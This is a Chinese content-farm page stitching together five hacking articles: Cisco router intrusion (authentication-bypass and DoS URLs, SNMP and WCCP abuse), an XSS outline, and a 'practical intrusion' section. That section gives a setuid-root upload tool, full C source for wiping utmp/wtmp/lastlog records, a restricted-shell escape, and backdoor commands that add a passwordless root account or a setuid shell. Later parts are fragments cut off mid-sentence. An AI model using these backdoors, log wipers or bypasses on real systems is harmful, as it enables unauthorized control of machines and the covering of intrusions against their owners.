欢迎来到千学网!
您现在的位置:首页 > 实用文 > 其他范文

入侵技术详解:cisco路由入侵艺术

时间:2022-12-15 08:25:29 其他范文 收藏本文 下载本文

下面是小编为大家整理的入侵技术详解:cisco路由入侵艺术,本文共5篇,仅供参考,大家一起来看看吧。

入侵技术详解:cisco路由入侵艺术

篇1: 入侵技术详解:cisco路由入侵艺术 (1)

奔流不息的网络里,Web绽放着绚丽的色彩、电子邮件呼哧的穿梭网际、语音电话、网络会议、文件传输,各种数据交织错落,形成辉煌的数字世界,

入侵技术详解:cisco路由入侵艺术 (1)

。在喧闹的数字世界底层,存在一种精致的次序,这种次序决定着数据的选路、异构介质衔接、协议的交互等功能。而这一次序的缔造者正是布满整个网络的路由器。于是,路由器成了数据通信的交通亭,也成为了众多黑帽(Blackhat)争夺的目标之一。

Cisco路由器占据这网络世界的绝对位置,于是安全焦点效应激发了路由入侵与防御而产生的精美艺术。下面我将由浅入深的方式讲述Cisco入侵的手段以及防御策略。

【路由器感冒】

路由器从本身的IOS来说,并不是一个健壮的体系,因而它偶尔也会让自己感冒发烧。系统感冒发烧起来,抵抗力自然就降低不少。

*IOS自身欺骗

Cisco路由器是用IOS系统来实现路由的细节功能,因此它是路由系统的灵魂。Show命令的在线系统方式却为我们打开一个偷窥之门。

众所周知,Cisco路由器中,一般用户只能查看路由器的很少信息。而能进入特权模式的用户才有资格查看全部信息和修改路由。一般模式下,show的在线帮助系统不会列表所有可用的命令,虽然75个show的扩展参数只能用于特权模式下(enable),实际上只有13个受到限制。这意味着一般用户(非特权用户)可以查看访问列表或其他路由安全相关信息。

重要安全相关的ACL信息可以被登录路由的非特权用户查看,诸如:

#show access-lists

#show ip prot

#show ip ospf dat

#sh ip eigrp top

等命令可以在非特权模式下泄露网络敏感信息。通过这些命令,我们能得出路由器配置的大致情况,这对采取进一步的入侵起到辅助作用。不过由于这种方式需要用户已经有一个登录帐户,因此得到这样的信息有一定难度。

*WCCP暗道

Cisco在IOS 11.2版本中引入WCCP(Web Cache Control Protocol),为Cisco缓存引擎提供协议通信。Cisco缓存引擎为www提供透明缓存服务。缓存引擎用WCCP来和其他cisco路由器通信。路由器把HTTP数据发送到缓存引擎主机中。

虽然这种方式默认是关闭的。假如使能(enable)的话,那么WCCP本身是没有认证机制的。路由器将会把每一个发送合法缓存引擎类型的Hello包的主机认为缓存引擎,于是把HTTP数据缓存到那台主机。这意味着恶意用户可以通过这种方式获取信息。

通过这种方式,攻击者可以截获站点认证信息,包括站点密码;替代实际WEB内容为自己设计的陷阱;通过路由彻底破坏Web提供的服务。这种方式,可以完全规避登录烦琐的攻击方法,对Web提供全面而且致命的打击。

我们既可关闭WCCP的启用机制,也可通过ACL阻止WCCP发送HTTP流量给不信任主机来防止这样的恶劣情况发生。

*HTTP服务的困惑

Cisco在IOS版本加入了远程管理路由的Web特性,这对于新羽(newbie)的管理员来,无疑是值得高兴的事情。但引入方便的同时,隐患也随之进入。

1.基于拒绝式服务攻击的HTTP的漏洞

Cisco路由启用(enable)远程WEB管理,很容易遭受DoS。这种DoS能导致路由器停止对网络请求的响应。这是功能是Cisco路由的内嵌功能。但启用这个特性,通过构造一个简单的Http请求就会造成DoS攻击:

/%%

这种请求导致路由停止响应,甚至引起路由器执行硬重置(hard reset)。

2.基于HTTP服务器查询的漏洞

Cisco 安全建议小组在10月30日公布了这个漏洞。IOS 11.0引入通过Web方式管理路由。”?”是HTML规范中定义的CGI参数的分界符。它也被IOS命令行接口解释成请求帮助。在IOS 12.0中,当问号邻接于”/”,URL解释器就不能正确解释其含义。当一个包括”?/”的URL对路由器HTTP服务器进行请求,并且提供一个有效的启用口令,则路由器进入死循环。因而引起路由崩溃并重起。

如果http起用,浏览

route_ip_addr/anytest?/

并且提供特权口令,则可以导致DoS攻击,导致路由停机或者重启,

除了让路由死亡之外,Http额外提供了一种可怕权限提升的漏洞,如下所论。

3.Cisco IOS 认证漏洞

当HTTP服务器启用并且使用本地用户认证方式。在某些条件,可以绕过认证并执行设备上的任何命令。用户可以对设备完全的控制。所有命令都将以最高特权执行(level 15)。

使用username 和password的路由设备帐户认证方式,构造如下URL:

router_ip_addr/level/xx/exec/….

(注:xx代表16至99之间的84种不同的组合攻击,因为路由器硬件类型众多,而IOS版本也存在不同,因此针对不同的路由器类型,攻击组合数字不同。)

通过这种方式,攻击者可以完全控制路由并可以改变路由表配置。这种可怕的事实让网管也感到惊悸。这种完整的控制方式将是网站数据通信枢纽的致命一击。

虽然Http漏洞带来如此之多的漏洞,但这种漏洞最主要原因是因为启用http服务器管理路由的缘故,由于这种管理是种命令行方式的替代物,因此对于熟练的网管来说,没有必要启动这种危害性很大的服务。

#no ip http server 的路由配置也成为时髦的安全配置语句。

【在SNMP中行走】

谈到Cisco路由的安全性,我们就必须涉及到SNMP这个看似简单,实际扮演着重要角色的协议,正因为它的存在,路由器的入侵变的丰富有趣多了。

*SNMP基础简介:

每个SNMP启用的路由设备都包含一个叫做管理信息模块(MIB),这是一种包含简单等级的数据目录结构,在这种树结构中包含设备各种信息。SNMP基本的命令GET,可以检索MIB的信息,而SET命令则可设置MIB变量。一种用于监控和管理CISCO路由的的软件工具是MRTG,至于如何配置其用于Cisco设备的监控可以参阅LOG的《怎样在Windows NT/2K下安装MRTG》一文(www.2hackers.org/cgi-bin/2hb/topic.cgi?forum=7&topic=212)。

在路由器中配置SNMP的方法如下:

(conf)#snmp-server community readonly RO

(conf)#snmp-server community readwrite RW

SNMP协议通过社区(community)字串的概念赋予对设备MIB对象访问的权限。上例中,设置了只读访问的社区字串readonly和可进行读写操作的readwrite社区字串。而大部分管理员喜欢使用public和private设置只读字串和读写字串,疏不知,这样轻易的结果将给网络带来巨大的波动。我们可以在【触及RouterKit】部分清楚认识到这种危害。

通过SNMP我们可以方便管理和监控Cisco的设备(参阅Log文章介绍),同时也给攻击者带来可乘之机。

*Cisco IOS软件SNMP读写ILMI社区字串漏洞

ILMI是一个独立的工业标准,用于配置ATM接口。MIB是一个树形结构,包括操作(只读)数据以及配置(读写)选项。在有漏洞的设备上,通过在SNMP请求中指定一个ILMI社团字符串,可以访问整个树形管理结构中三个特定部分的对象:MIB-II系统组,LAN-EMULATION-CLIENT MIB以及PNNI(Private Network-to-Network Interface)MIB。每一部分的子集对象都可以使用相同的“ILMI”社团字符串修改。

MIB-II系统组包括设备本身的基本信息。能被修改对象的数目虽然是有限的。例如包括:

system.sysContact.

system.sysLocation.

system.sysName.

Cisco IOS软件版本11.x和12.0允许使用一个非文档的ILMI社区字串未经授权就查看和修改某些SNMP对象。其中就包括诸如上面所说的“sysContact”,“sysLocation”,和“sysName”对象,虽然修改它们不会影响设备的正常操作,但如果意外修改可能会产生混乱。剩下的对象包含于LAN-EMULATION-CLIENT和PNNI MIBs,修改这些对象可以影响ATM配置。如果没有防止未授权使用ILMI社团字符串,一台有漏洞的路由器可能会遭受DoS攻击。

如果SNMP请求可以被有漏洞的设备接收,那么没有适当授权,就可以访问某些MIB对象,违背了保密性。没有授权就可以修改可读MIB对象的子集,破坏了完整性。而更具有危害性的方法是向SNMP端口发送大量的读和写请求。有漏洞的设备,如果没有防范接收SNMP包的措施,就会遭受DoS攻击,导致路由重载。

篇2:跨站入侵技术详解

总体介绍

简单介绍什么是XSS攻击

如何寻找XSS漏洞

对于XSS攻击的总体思路

来自内部的攻击:

如何寻找内部的XSS漏洞

如何构造攻击

如何利用

结何实例攻击,如DVBBS&BBSXP

来自外部的攻击

如何构造XSS攻击

如何欺骗管理员打开

XSS与其它技术的结何

与mssql injection的结合

QQ跨站的结何

国内大型统计网站的跨站漏洞

社会工程学

正文:

XSS总体介绍

什么是XSS攻击

XSS又叫CSS (Cross Site Script) ,跨站脚本攻击,

跨站入侵技术详解

它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。而本文主要讲的是利用XSS得到目标服务器的shell。技术虽然是老技术,但是其思路希望对大家有帮助。

篇3: 入侵的技术

1 、UPLOAD

侵入成功后,拿到root权限了,这个东东可以把他的服务器的访问权限改了,让任何人都可以上传文件 !

root 状 态 下, 运 行 Install 后,

upload 将 允 许 普 通 用 户 上 载 文 件 至 任 何 目 录 下,

入侵的实用技术大全

# chmod 755 install

#./install

$ more install

#! /bin/csh -f

cc upload.c

cp a.out upload

chown root upload

chmod 755 upload

chmod u+s upload

$ more upload.c

#include

main

{

char filename[48];

printf( “This program will upload up.txt ASCII file to specified file\n” );

printf( “XXX Copyright Reserved\n” );

printf( “Where to upload (include path and filename)? ” );

gets( filename );

upload( filename );

}

int upload( filename )

char *filename;

{

FILE *fp,*outp;

char c;

fp=fopen( “up.txt”,“r” );

utp=fopen( filename,“w” );

if( fp== NULL ) {

printf( “file not exist.” );

return 0;

}

for( ;; ) {

c= fgetc( fp );

if feof( fp ) break;

printf( “%c”,c );

fputc( c, outp );

}

fclose( fp );

fclose( outp );

return 1;

}

2、破坏现场

进入系统后,出来以前怎么破坏现场?抹掉自己的脚印?

编辑 /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog.

请使用专门的编辑器

例子:

#include

#include

#include

#include

#include

#include

#include

#include

#define WTMP_NAME “/usr/adm/wtmp”

#define UTMP_NAME “/etc/utmp”

#define LASTLOG_NAME “/usr/adm/lastlog”

int f;

void kill_utmp(who)

char *who;

{

struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {

while(read (f, &utmp_ent, sizeof (utmp_ent))>0 )

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof( utmp_ent ));

lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

write (f, &utmp_ent, sizeof (utmp_ent));

}

close(f);

}

}

void kill_wtmp(who)

char *who;

{

struct utmp utmp_ent;

long pos;

pos = 1L;

if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {

lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

pos = -1L;

} else {

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof(struct utmp ));

lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

write (f, &utmp_ent, sizeof (utmp_ent));

pos = -1L;

} else pos += 1L;

}

}

close(f);

}

}

void kill_lastlog(who)

char *who;

{

struct passwd *pwd;

struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

bzero((char *)&newll,sizeof( newll ));

write(f, (char *)&newll, sizeof( newll ));

close(f);

}

} else printf(“%s: ?\n”,who);

}

main(argc,argv)

int argc;

char *argv[];

{

if (argc==2) {

kill_lastlog(argv[1]);

kill_wtmp(argv[1]);

kill_utmp(argv[1]);

printf(“Zap2!\n”);

} else

printf(“Error.\n”);

}

3、突破SHELL

许多攻击系统的方法都需要攻击者首先有一个命令行式的Shell,如 /bin/csh ,

但有些系统提供给用户的却是菜单式的定制Shell,如 pink 。所以如果你想攻击这个系统的话,首先必须要冲破这个定制shell。

我们可以利用 vi (UNIX中标准的编辑器) 的一些命令来达到这个目的。具体过程如下:

(1).在定制Shell中选择编辑文件,这时系统启动 vi。

(2).在 vi 中,输入以下命令序列:(注意:输入的命令包括最前面的 ':' )

:set shell=/bin/csh

:shell

3.这时,就像在DOS程序的File菜单中选择Dos Shell菜单项一样,系统启动一个Shell,而这个Shell刚刚被我们设定成 /bin/csh,因此我们就得到了一个命令行式的Unix Shell。

4、后门

进入一个系统以后随手留下一个后门确实是很好的习惯:) 这里介绍几种简单的后门设置方法:

(1). setuid

#cp /bin/sh /tmp/.backdoor

#chmod u+s /tmp/.backdoor

加上 suid 位到shell 上,最为简单方便.

(2). echo “wyj::0:0::/:/bin/csh” >>/etc/passwd

即给系统增加一个 id 为 0(root)的帐号,无口令.

(3). echo “+ wyj”>>/.rhosts

即本地的名为wyj的用户可以直接 rlogin target 无须口令此时的wyj就相当于口令,不知道的人是不能进去的.前提是目标的port 512or513or514 opening.

篇4:网络入侵详解 第

2.1) DoS攻击 2.1.1) Syn-flooding 向目标发起大量TCP连接请求,但不按TCP协议规定完成正常的3次握手,导致目标系统等待并耗费其网络资源,从而导致其网络服务不可用,

网络入侵详解 第二篇

2.1.2) Ping-flooding 向目标系统发大量ping包,i.e.ICMP_ECHO包,使目标的网络接口应接

篇5:网络入侵详解(网络入侵实例)

入侵一个系统有很多步骤,阶段性很强的工作,其最终的目标是获得超级用户权限对目标系统的绝对控制,

网络入侵详解(网络入侵实例)

从对该系统一无所知开始,我们利用其提供的各种网络服务收集关于它的信息,这些信息暴露出系统的安全脆弱性或潜在入口;然后我们利用这些网络服务固有的或

手把手教你入侵

网络入侵详解 第

Linux入侵响应案例

渗透入侵教程分析

入侵一个 的临时笔记

如何检查系统入侵Windows系统

杂谈入侵检测防御系统

浅析入侵网站的基本步骤

浅析Webedit在线编辑器的入侵

网络攻击入侵方式主要有几种

《入侵技术详解:cisco路由入侵艺术(整理5篇).doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

点击下载本文文档